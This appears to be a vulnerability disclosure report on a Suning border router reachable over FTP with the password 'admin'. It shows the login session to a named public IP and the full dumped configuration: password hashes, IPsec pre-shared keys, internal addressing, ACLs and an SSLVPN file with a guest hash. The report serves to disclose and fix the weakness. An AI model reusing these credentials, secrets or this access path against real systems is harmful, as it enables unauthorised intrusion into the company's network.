There is a weak password in a certain Suning border network device (which can overwrite the configuration file with the SSLVPN function)

There is a weak password in a certain Suning border network device (which can overwrite the configuration file with the SSLVPN function)

A vbr in Suning has a weak password (with SSLVPN configuration file), which may bypass the border firewall.

Weak ftp service password for network devices: admin

172-13-1-117:~ root$ ftp 58.213.19.168Connected to 58.213.19.168.220 FTP service ready.Name (58.213.19.168:root): admin331 Password required for admin.Password: 230 User logged in.Remote system type is H3C.ftp> ls227 Entering Passive Mode (58,213,19,168,19,23).125 ASCII mode data connection already open, transfer starting for /*.drwxrwxrwx   1 noone    nogroup         0 Oct 19  2010 logfile-rwxrwxrwx   1 noone    nogroup     16256 Oct 19  2010 p2p_default.mtd-rwxrwxrwx   1 noone    nogroup      3751 Aug 18  2014 system.xml-rwxrwxrwx   1 noone    nogroup      6187 Aug 18  2014 startup.cfg-rwxrwxrwx   1 noone    nogroup  27450368 Jul 08  2014 msr30-cmw520-r2513p01-si.bin-rwxrwxrwx   1 noone    nogroup  24621440 Jul 08  2014 msr30-cmw520-r2207-si.bin-rwxrwxrwx   1 noone    nogroup  17449340 Jul 08  2014 msr30-cmw520-r2207p38-bi.bin-rwxrwxrwx   1 noone    nogroup     20147 Aug 18  2014 config.cwmp-rwxrwxrwx   1 noone    nogroup      5324 Jul 25  2014 _startup_bak.cfg-rwxrwxrwx   1 noone    nogroup    476922 Aug 01  2014 vpn3040.diag-rwxrwxrwx   1 noone    nogroup    188545 Aug 17  2014 default.diag-rwxrwxrwx   1 noone    nogroup  18324480 Aug 18  2014 msr30-cmw520-r2311-bi.bin226 Transfer complete.

Infrastructure authentication information, confirmed as suning Device

local-user suning password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+ authorization-attribute level 3 service-type ssh

Telnet and http Management ports are opened externally.
 

 

Suning: transparent internal network architecture

# dar p2p signature-file cfa0:/p2p_default.mtd# port-security enable# password-recovery enable#acl number 2000 rule 0 permit source 10.22.9.5 0 rule 5 permit source 10.22.9.215 0 rule 10 permit source 10.21.160.99 0#acl number 3000 rule 0 permit ip source 58.213.19.168 0 destination 221.226.125.148 0 rule 5 permit ip source 1.1.1.1 0 rule 10 permit ip source 221.226.125.148 0 rule 15 permit ip source 2.2.2.2 0acl number 3002 match-order auto description 2xuzhuang?T?ù rule 0 permit ip destination 192.168.40.149 0acl number 3303 match-order auto description vpn2xuzhuang rule 10 deny ip source 10.21.160.99 0 rule 0 deny ip destination 10.21.160.99 0 rule 5 permit ipacl number 3304 match-order auto rule 5 permit ip source 192.168.0.0 0.0.255.255 rule 10 permit ip source 10.19.0.0 0.0.255.255 rule 15 permit ip source 10.24.0.0 0.0.255.255 rule 20 permit ip source 10.22.0.0 0.0.255.255 rule 0 deny ip destination 192.168.13.49 0#vlan 1#domain system access-limit disable state active idle-cut disable self-service-url disable#ike proposal 1 encryption-algorithm 3des-cbc#ike peer access exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$t6cH9TYK0j2lvziyz+VkcwnYSezftt1ugw== id-type name remote-name access nat traversal#ike peer xinjiekou exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$fOTu6fpwl5bY1oMj/cT2stF3Ue5ED707rVdZUw== id-type name remote-name xinjiekou nat traversal#ike peer yinhe exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$qjZO04rPk/ZAh0UJXOOG37rn958LzcHx3CZ/cuw= id-type name remote-name yinhe nat traversal#ipsec transform-set default encapsulation-mode tunnel transform esp esp authentication-algorithm md5 esp encryption-algorithm 3des#ipsec policy-template xinjiekou 1 ike-peer xinjiekou transform-set default#ipsec policy-template xuzhuang 1 ike-peer access transform-set default#ipsec policy-template yinhe 1 ike-peer yinhe transform-set default#ipsec policy ipsecdx 1 isakmp template xuzhuang#ipsec policy ipsecdx 2 isakmp template yinhe#ipsec policy ipsecdx 3 isakmp template xinjiekou#policy-based-route vpn2xuzhuang permit node 10 if-match acl 3303 apply ip-address next-hop 192.168.13.50#policy-based-route vpnup permit node 20 if-match acl 3304 apply ip-address next-hop 192.168.13.205 apply ip-address next-hop 192.168.13.209#user-group system group-attribute allow-guest#local-user admin password cipher $c$3$kczijeyDQHGhKbH67mwOnmOlFMY1ZeHd authorization-attribute level 3 service-type telnet service-type ftplocal-user suning password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+ authorization-attribute level 3 service-type ssh#interface Aux0 async mode flow link-protocol ppp#interface Cellular0/0 async mode protocol link-protocol ppp#interface Serial4/0 link-protocol ppp#interface NULL0#interface LoopBack0#interface LoopBack1000#interface GigabitEthernet0/0 port link-mode route#interface GigabitEthernet0/0.104 description To_JS5060-1?￥áa.025 vlan-type dot1q vid 104#interface GigabitEthernet0/0.1101 description To_C7609-1?￥áa vlan-type dot1q vid 1101 ip policy-based-route vpn2xuzhuang#interface GigabitEthernet0/0.1102 description To_C7609-2?￥áa vlan-type dot1q vid 1102 ip policy-based-route vpn2xuzhuang#interface GigabitEthernet0/1 port link-mode route description To_?￥áaí?#interface GigabitEthernet0/1.2 description To_CTC01 vlan-type dot1q vid 2 ipsec policy ipsecdx qos gts acl 3002 cir 50000 cbs 3125000 ebs 0 queue-length 50#interface Tunnel0 description To_Dì×ˉ×ü2? mtu 1524 source LoopBack0 destination 2.2.2.2 ip policy-based-route vpnup#nqa entry 1 1 type icmp-echo  data-size 20  destination ip 192.168.13.50  frequency 1000  probe count 2  probe timeout 50  reaction 1 checked-element probe-fail threshold-type consecutive 2 action-type trigger-only  source ip 192.168.13.49  ttl 1# ip route-static 0.0.0.0 0.0.0.0 58.213.19.129 preference 5 ip route-static 10.19.250.6 255.255.255.255 192.168.13.50 ip route-static 10.21.160.99 255.255.255.255 192.168.13.205 ip route-static 10.21.160.99 255.255.255.255 192.168.13.209 preference 120 ip route-static 10.21.160.245 255.255.255.255 192.168.13.205 ip route-static 10.22.9.5 255.255.255.255 192.168.13.205 ip route-static 10.22.9.5 255.255.255.255 192.168.13.209 preference 120 ip route-static 10.22.9.215 255.255.255.255 192.168.13.50 ip route-static 172.33.0.1 255.255.255.255 172.16.0.1 ip route-static 172.33.0.2 255.255.255.255 172.16.0.2 ip route-static 192.168.0.0 255.255.0.0 192.168.13.209 preference 120 ip route-static 192.168.0.0 255.255.0.0 192.168.13.205#

 

system.xml

<!-- XML CONFIGURATION FILE --><sslvpn><diyview><title-diy-table><row><index-title>SSL&#32;VPN</index-title><welcome-title>Welcome&#32;to&#32;SSL&#32;VPN</welcome-title><service-title>SSL&#32;VPN</service-title></row></title-diy-table><pic-save-table><row><service-logo>/svpn/images/h3c.gif</service-logo><service-bg>/svpn/images/top_right_01.jpg</service-bg><index-logo>/svpn/images/h3c.gif</index-logo></row></pic-save-table><all-diy-table><row><enable>0</enable></row></all-diy-table></diyview><resview><res-ipac-global-table><row><keepalive>10</keepalive><clireach>0</clireach><onlyvpn>0</onlyvpn><sevdis>0</sevdis></row></res-ipac-global-table><res-group-table><row><id>33890</id><name>autohome</name></row><row><id>17507</id><name>autostart</name></row></res-group-table></resview><userview><user-group-table><row><id>17408</id><name>Guests</name></row></user-group-table><user-table><row><id>2162688</id><name>guest</name><description>Default&#32;guest&#32;user</description><password-md5>3C943016CF71D795F741F76EED5B63AF</password-md5><public>0</public><public-limit>0</public-limit><status>0</status><period>0-0-0</period><studymac>0</studymac></row></user-table></userview><domainview><domain-policy-table><row><enable-sec-policy>0</enable-sec-policy><enable-verify>0</enable-verify><enable-only-client>0</enable-only-client><enable-bind-mac>0</enable-bind-mac><enable-auto-login>0</enable-auto-login><user-out-time>30</user-out-time><dft-auth-method>1</dft-auth-method><cert-sect>0</cert-sect><verify-out-time>120</verify-out-time></row></domain-policy-table><cache-policy-table><row><clear-cache>1</clear-cache><clear-cookie>1</clear-cookie><clear-client>0</clear-client><clear-config>1</clear-config></row></cache-policy-table><dom-loc-auth-table><row><cerpol>0</cerpol></row></dom-loc-auth-table><dom-radius-auth-table><row><ifstartauth>0</ifstartauth><cerpol>0</cerpol><ifstartcharge>0</ifstartcharge><ifupvirtualaddr>0</ifupvirtualaddr></row></dom-radius-auth-table><dom-ldap-auth-table><row><servport>389</servport><version>3</version><cerpol>0</cerpol><ifstartauth>0</ifstartauth><checkmethod>TEMPLATE</checkmethod></row></dom-ldap-auth-table><dom-ad-auth-table><row><cerpol>0</cerpol><ifstartauth>0</ifstartauth><serverectime>5</serverectime><usrnamestyle>0</usrnamestyle></row></dom-ad-auth-table><dom-comb-auth-table><row><ifstartcombauth>0</ifstartcombauth><cerpol>0</cerpol><ifinputpaswrdagain>0</ifinputpaswrdagain><cerpol_a>0</cerpol_a></row></dom-comb-auth-table></domainview><servermng><server-mng-table><row><enable>0</enable><port>443</port></row></server-mng-table></servermng></sslvpn><nat><nat><respond-table><row><respond-get>0</respond-get></row></respond-table></nat></nat><waninter><macaddress><macclone-table><row><ifindex>1048576</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1048577</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row><row><ifindex>1049396</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row><row><ifindex>1049394</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1049395</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1049393</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row></macclone-table></macaddress></waninter><seclanserver><rdserver><rds-auth-table><row><auth-enable>0</auth-enable></row></rds-auth-table></rdserver></seclanserver>

Solution:

Disable the Internet interface